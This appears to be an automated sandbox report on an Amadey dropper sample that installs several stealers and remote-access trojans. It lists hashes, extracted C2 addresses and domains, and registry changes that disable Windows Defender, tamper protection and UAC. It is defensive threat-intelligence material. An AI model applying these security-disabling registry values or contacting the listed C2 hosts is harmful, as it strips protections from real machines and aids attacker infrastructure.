amadey | 92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24

Analysis

max time kernel
113s
max time network
120s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-12-2024 11:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe
Size

6.8MB
MD5

bd936591788239fbb26cbcd3cbbad820
SHA1

fe40ec9445cc8617660532b7d502096ddb26eda0
SHA256

92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24
SHA512

b8361b981c02ae0b519eaf5ce310e19c146a8d9798c0e4d3ec53830afef3e7977efe0bf66868606531a8e15f56c83f8f381749f9fb49ed78c2f5eba161e1fb06
SSDEEP

196608:fdqR7wsVcT2zWZYK6sfqVSCxBDcn9fwc:fd2ST2zWm/ckSacnb

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

http://185.215.113.43

Attributes

install_dir
abc3bc1985
install_file
skotes.exe
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
url_paths
/Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

drum

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

stealc

Botnet

stok

http://185.215.113.206

Attributes

url_path
/c4becf79229cb002.php

Extracted

Family

lumma

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma

Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	66c0d22e78.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	66c0d22e78.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	66c0d22e78.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	66c0d22e78.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	66c0d22e78.exe

Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral1/memory/1208-219-0x0000000009DC0000-0x0000000009EE2000-memory.dmp	family_stormkitty

Stormkitty family
stormkitty

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 3652 created 4156	3652	powershell.exe	96
PID 2624 created 4156	2624	powershell.exe	96

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0"	H3tyh96.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	H3tyh96.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0"	H3tyh96.exe

VenomRAT 6 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral1/memory/1208-94-0x00000000001C0000-0x0000000000622000-memory.dmp	VenomRAT
behavioral1/memory/1208-93-0x00000000001C0000-0x0000000000622000-memory.dmp	VenomRAT
behavioral1/memory/112-159-0x0000000000400000-0x0000000000418000-memory.dmp	VenomRAT
behavioral1/files/0x0007000000023c86-289.dat	VenomRAT
behavioral1/memory/4500-293-0x0000000000370000-0x0000000000388000-memory.dmp	VenomRAT
behavioral1/memory/1208-296-0x00000000001C0000-0x0000000000622000-memory.dmp	VenomRAT

Venomrat family
venomrat

Async RAT payload 4 IoCs

rat

resource	yara_rule
behavioral1/memory/1208-94-0x00000000001C0000-0x0000000000622000-memory.dmp	family_asyncrat
behavioral1/memory/1208-93-0x00000000001C0000-0x0000000000622000-memory.dmp	family_asyncrat
behavioral1/files/0x0007000000023c86-289.dat	family_asyncrat
behavioral1/memory/1208-296-0x00000000001C0000-0x0000000000622000-memory.dmp	family_asyncrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1W45c9.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	2w1248.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	3K30M.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4X755p.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	d6454dce3f.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	ecb59b7c34.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	4e424400cf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	H3tyh96.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	66c0d22e78.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 24 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3K30M.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4X755p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	H3tyh96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	ecb59b7c34.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4e424400cf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	4X755p.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	H3tyh96.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	d6454dce3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1W45c9.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	ecb59b7c34.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	66c0d22e78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	2w1248.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	2w1248.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3K30M.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	d6454dce3f.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	4e424400cf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	66c0d22e78.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1W45c9.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	skotes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	H3tyh96.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	1W45c9.exe

Executes dropped EXE 17 IoCs

pid	Process
3732	n6e29.exe
1432	T0B47.exe
3040	1W45c9.exe
1064	skotes.exe
4488	2w1248.exe
4304	3K30M.exe
4288	4X755p.exe
1988	Z9Pp9pM.exe
1208	H3tyh96.exe
3080	d6454dce3f.exe
1540	ecb59b7c34.exe
3184	4e424400cf.exe
1668	skotes.exe
1812	cb73b4a261.exe
4500	ClientAny.exe
4072	66c0d22e78.exe
6524	skotes.exe

Identifies Wine through registry keys 2 TTPs 12 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	66c0d22e78.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	1W45c9.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	4X755p.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	d6454dce3f.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	4e424400cf.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	2w1248.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	3K30M.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	H3tyh96.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Wine	ecb59b7c34.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Windows security modification 2 TTPs 3 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	4X755p.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	66c0d22e78.exe

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ecb59b7c34.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013691001\\ecb59b7c34.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\4e424400cf.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013692001\\4e424400cf.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cb73b4a261.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013693001\\cb73b4a261.exe"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\66c0d22e78.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1013694001\\66c0d22e78.exe"	skotes.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	n6e29.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	T0B47.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua	H3tyh96.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0"	H3tyh96.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2392	powershell.exe
5016	powershell.exe
2152	powershell.exe

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0008000000023c8a-232.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs

pid	Process
3040	1W45c9.exe
1064	skotes.exe
4488	2w1248.exe
4304	3K30M.exe
4288	4X755p.exe
1208	H3tyh96.exe
3080	d6454dce3f.exe
1540	ecb59b7c34.exe
3184	4e424400cf.exe
4072	66c0d22e78.exe
6524	skotes.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1208 set thread context of 112	1208	H3tyh96.exe	100

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	1W45c9.exe

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1424	sc.exe
3704	sc.exe
2392	sc.exe
3416	sc.exe
1536	sc.exe
3484	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
3720	112	WerFault.exe	100
1232	1208	WerFault.exe	92
6172	3080	WerFault.exe	95

System Location Discovery: System Language Discovery 1 TTPs 47 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	92475d4a09d19b74ab16a851b6d4a7e460040089e49c953d3eae3e460e26ef24N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	T0B47.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cb73b4a261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	cb73b4a261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ecb59b7c34.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4e424400cf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	66c0d22e78.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	n6e29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Z9Pp9pM.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	whoami.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3K30M.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	H3tyh96.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	d6454dce3f.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RegSvcs.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	cb73b4a261.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1W45c9.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2w1248.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4X755p.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
3888	taskkill.exe
1308	taskkill.exe
1668	taskkill.exe
2516	taskkill.exe
372	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
